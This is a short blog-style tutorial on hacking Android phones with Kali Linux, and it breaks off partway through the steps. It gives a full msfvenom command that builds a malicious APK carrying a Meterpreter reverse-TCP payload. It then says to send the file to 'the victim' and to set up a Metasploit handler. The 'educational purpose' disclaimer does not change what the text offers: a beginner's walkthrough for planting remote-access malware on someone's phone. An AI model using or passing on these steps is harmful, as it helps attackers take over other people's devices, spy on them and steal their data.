How To Hack Android Phones Using Kali Linux 2018
If you want to learn to hack android phone, then this article is for you guys! And do not worry if you beginner, I'll show you step by step . Just make sure to read the full article. Warning:- This Hack is to educate you, this only for Educational Purpose. Don’t try to do any illegal stuffs. Requirements: 1. Kali Linux installed. 2. An Android phone. STEPS 1. Open Terminal in Kali Linux. 2.We'll use MSFVENOM to create a malicious apk file which is to be installed on the victims android phone. 3.Paste the command, msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.xx.xx R> root/techcsnerd.apk make sure to replace "1792.168.xx.xx" to your own local IP address. 4. Now open the root folder and send the techcsnerd.apk to the victim. 5. Open a new terminal and enter “msfconsole.” 6. After opening Metasploit console type these following commands which are used to create payload handler which will create...